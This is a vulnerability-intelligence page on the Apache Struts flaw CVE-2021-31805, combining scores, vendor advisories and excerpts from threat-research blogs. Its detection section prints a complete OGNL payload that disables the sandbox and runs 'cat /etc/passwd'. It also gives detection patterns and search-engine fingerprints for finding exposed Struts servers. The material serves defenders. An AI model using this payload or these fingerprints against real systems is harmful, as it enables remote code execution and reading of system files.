CVE-2021-31805
published 2022-04-12CVE-2021-31805: The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation…
PriorityP191critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
85.31%
99.7th percentile
The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | struts | 2.0.0 – 2.5.29 | — |
Detection & IOCsextracted from sources · hover to see the quote
command%{
(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +
(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +
(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))
}↗
- →Exploit is delivered via HTTP POST with multipart/form-data body; the OGNL payload is injected into a form field (e.g., 'id') using the %{...} forced-evaluation syntax. Monitor for multipart POST requests containing OGNL expressions with BeanMap, memberAccess, excludedPackageNames, excludedClasses, or InstanceManager references. ↗
- →The payload abuses 'freemarker.template.utility.Execute' instantiated via 'org.apache.tomcat.InstanceManager' to achieve RCE. Alert on any OGNL expression referencing these class names in HTTP request bodies. ↗
- →Shodan/FOFA fingerprints for exposed Struts2 instances: search for HTTP HTML containing 'apache struts', page title 'struts2 showcase', or HTML containing 'struts problem report'. ↗
- →The exploit bypasses OGNL sandbox by zeroing out 'excludedPackageNames' and 'excludedClasses' via BeanMap reflection chain — a pattern shared with S2-061 (CVE-2020-17530). Detections for S2-061 payloads should be extended to cover this variant. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
ghsa9.8CRITICAL
osv9.8CRITICAL
vulncheck9.8CRITICAL
vendor_oracle9.8CRITICAL
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Oracle
Oracle Oracle Hyperion Risk Matrix: Installation and Configuration (Apache Struts) — CVE-2021-31805
vendor_oracle·2023-01-15·CVSS 9.8
CVE-2021-31805 [CRITICAL] Oracle Oracle Hyperion Risk Matrix: Installation and Configuration (Apache Struts) — CVE-2021-31805
Oracle Oracle Hyperion Risk Matrix: Installation and Configuration (Apache Struts) vulnerability
CVE: CVE-2021-31805
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpujan2023 (JAN 2023)
Oracle
Oracle Oracle Communications Risk Matrix: Configuration Management Platform (Apache Struts) — CVE-2021-31805
vendor_oracle·2022-10-15·CVSS 9.8
CVE-2021-31805 [CRITICAL] Oracle Oracle Communications Risk Matrix: Configuration Management Platform (Apache Struts) — CVE-2021-31805
Oracle Oracle Communications Risk Matrix: Configuration Management Platform (Apache Struts) vulnerability
CVE: CVE-2021-31805
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpuoct2022 (OCT 2022)
Oracle
Oracle Oracle Hospitality Applications Risk Matrix: Login (Apache Struts) — CVE-2021-31805
vendor_oracle·2022-07-15·CVSS 9.8
CVE-2021-31805 [CRITICAL] Oracle Oracle Hospitality Applications Risk Matrix: Login (Apache Struts) — CVE-2021-31805
Oracle Oracle Hospitality Applications Risk Matrix: Login (Apache Struts) vulnerability
CVE: CVE-2021-31805
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpujul2022 (JUL 2022)
Red Hat
Struts: Forced OGNL evaluation, when evaluated on raw not validated user input in tag attributes, may lead to RCE.
vendor_redhat·2022-04-12·CVSS 9.8
CVE-2021-31805 [CRITICAL] CWE-917 Struts: Forced OGNL evaluation, when evaluated on raw not validated user input in tag attributes, may lead to RCE.
Struts: Forced OGNL evaluation, when evaluated on raw not validated user input in tag attributes, may lead to RCE.
The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.
Statement: Apache Struts2 is not compiled, shipped, used, or enabled in Red Hat products. As such, any CVE against Apache Struts2 does not impact currently supported Red Hat products.
This statement was last revised on 1 Sept 2020.
Previous statement example: https://bugzilla.redhat.com/show_bug.cgi?id=1469265
Package: struts (Red Ha
OSV
Expression Language Injection in Apache Struts
osv·2022-04-13·CVSS 9.8
CVE-2021-31805 [CRITICAL] Expression Language Injection in Apache Struts
Expression Language Injection in Apache Struts
The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.
GHSA
Expression Language Injection in Apache Struts
ghsa·2022-04-13·CVSS 9.8
CVE-2021-31805 [CRITICAL] CWE-917 Expression Language Injection in Apache Struts
Expression Language Injection in Apache Struts
The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.
VulnCheck
Apache Struts Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
vulncheck·2021·CVSS 9.8
CVE-2021-31805 [CRITICAL] Apache Struts Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
Apache Struts Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.
Affected: Apache Struts
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://blog.netlab.360.com/public-cloud-threat-intelligence-202204/; https://media.kasperskycontenthub.com/wp-
No detection rules found.
Nuclei
Apache Struts2 S2-062 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2021-31805 [CRITICAL] Apache Struts2 S2-062 - Remote Code Execution
Apache Struts2 S2-062 - Remote Code Execution
Apache Struts2 S2-062 is vulnerable to remote code execution. The fix issued for CVE-2020-17530 (S2-061) was incomplete, meaning some of the tag's attributes could still perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax.
Template:
id: CVE-2021-31805
info:
name: Apache Struts2 S2-062 - Remote Code Execution
author: taielab
severity: critical
description: Apache Struts2 S2-062 is vulnerable to remote code execution. The fix issued for CVE-2020-17530 (S2-061) was incomplete, meaning some of the tag's attributes could still perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax.
impact: |
Remote code execution
remediation: Avoid using forced OGNL ev
Qualys
Identify Server-Side Attacks Using Qualys Periscope | Qualys
blogs_qualys·2022-12-01·CVSS 8.8
[HIGH] Identify Server-Side Attacks Using Qualys Periscope | Qualys
#### Table of Contents
- Potential False Positives
- Potential False Negatives
Qualys previously announced the introduction of Qualys Periscope in 2020. This technology allows Qualys Web Application Scanning (WAS) to detect out-of-band vulnerabilities such as server-side request forgery (SSRF). Qualys Periscope provides confirmed detections for additional vulnerabilities, such as Log4j, where it enables rapid development and release of the QID. Occasionally, Qualys receives questions and support cases related to Qualys Periscope. This article will provide more detail on the common questions/situations seen with out-of-band detections.
As of publishing, the vulnerability detections that utilize Qualys Periscope are:
- QID 150055 – OS Command Injection
- QID 150179 – Blind XXE injection
Qualys
Identify Server-Side Attacks Using Qualys Periscope
blogs_qualys·2022-12-01·CVSS 8.8
[HIGH] Identify Server-Side Attacks Using Qualys Periscope
## Table of Contents
Potential False Positives
Potential False Negatives
Qualys previously announced the introduction of Qualys Periscope in 2020. This technology allows Qualys Web Application Scanning (WAS) to detect out-of-band vulnerabilities such as server-side request forgery (SSRF). Qualys Periscope provides confirmed detections for additional vulnerabilities, such as Log4j, where it enables rapid development and release of the QID. Occasionally, Qualys receives questions and support cases related to Qualys Periscope . This article will provide more detail on the common questions/situations seen with out-of-band detections.
As of publishing, the vulnerability detections that utilize Qualys Periscope are:
QID 150055 – OS Command Injection
QID 150179 – Blind XXE injection
QID 15
Fortinet
Mirai, RAR1Ransom, and GuardMiner – Multiple Malware Campaigns Target VMware Vulnerability
blogs_fortinet·2022-10-21·CVSS 9.8
CVE-2022-22954 [CRITICAL] Mirai, RAR1Ransom, and GuardMiner – Multiple Malware Campaigns Target VMware Vulnerability
FORTIGUARD LABS THREAT RESEARCH
Mirai, RAR1Ransom, and GuardMiner – Multiple Malware Campaigns Target VMware Vulnerability
By Cara Lin | October 21, 2022
In April, VMware patched a vulnerability CVE-2022-22954. It causes server-side template injection because of the lack of sanitization on parameters “deviceUdid” and “devicetype”. It allows attackers to inject a payload and achieve remote code execution on VMware Workspace ONE Access and Identity Manager. FortiGuard Labs published Threat Signal Report about it and also developed IPS signature in April.
We observed attacks in the wild since then. Most of the payloads focus on probing a victim’s sensitive data, for example, passwords, hosts file, etc. But in August, there were a few particular payloads, which got our interest. They had th
Unit42
Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report
blogs_unit42·2022-07-21·CVSS 9.8
CVE-2017-5638 [CRITICAL] Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report
Threat Research Center
Trend Reports
Vulnerabilities
## Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report
Unit 42
Published: July 21, 2022
Trend Reports
Vulnerabilities
Apache Log4j
CVE-2017-5638
CVE-2017-9841
CVE-2018-19986
CVE-2019-02320
CVE-2019-19597
CVE-2019-9082
CVE-2020-14882
CVE-2020-14883
CVE-2020-15505
CVE-2020-15506
CVE-2020-25078
CVE-2020-5902
CVE-2021-21315
CVE-2021-22986
CVE-2021-26855
CVE-2021-31805
CVE-2021-34473
CVE-2021-35464
CVE-2021-38647
CVE-2021-40438
CVE-2021-40539
CVE-2021-41773
CVE-2021-42013
CVE-2021-44228
CVE-2021-45046
CVE-2022-22963
CVE-2022-22965
Network security trends
Unit 42 Network Threat Trends Research Report
## Executive Summary
Tens of thousands of vulnerabilities are repo
Unit42
Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report
blogs_unit42·2022-07-21·CVSS 9.8
[CRITICAL] Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report
## Executive Summary
Tens of thousands of vulnerabilities are reported every year, but not all are used by threat actors in real-world attacks. There are many reasons for this: a proof of concept (PoC) may not be available for attackers to weaponize, it may be too difficult to exploit the vulnerability, there may be a lack of accessible vulnerable software on the internet, or attackers may simply deem a vulnerability not worth exploiting due to low impact. Real-world defenders need real-world data on which vulnerabilities attackers are choosing to exploit – and where to focus protections.
In the 2022 Unit 42 Network Threat Trends Research Report, we’ve used data captured by the Palo Alto Networks Advanced Threat Prevention security service on Next-Generation Firewall and Prisma SASE from
Greynoiseio
NoiseLetter
blogs_greynoiseio
NoiseLetter
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
GreyNoise Round-Up: Product Updates
blogs_greynoiseio
GreyNoise Round-Up: Product Updates
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
http://www.openwall.com/lists/oss-security/2022/04/12/6https://cwiki.apache.org/confluence/display/WW/S2-062https://security.netapp.com/advisory/ntap-20220420-0001/https://www.oracle.com/security-alerts/cpujul2022.htmlhttp://www.openwall.com/lists/oss-security/2022/04/12/6https://cwiki.apache.org/confluence/display/WW/S2-062https://security.netapp.com/advisory/ntap-20220420-0001/https://www.oracle.com/security-alerts/cpujul2022.html
2022-04-12
Published
Exploited in the wild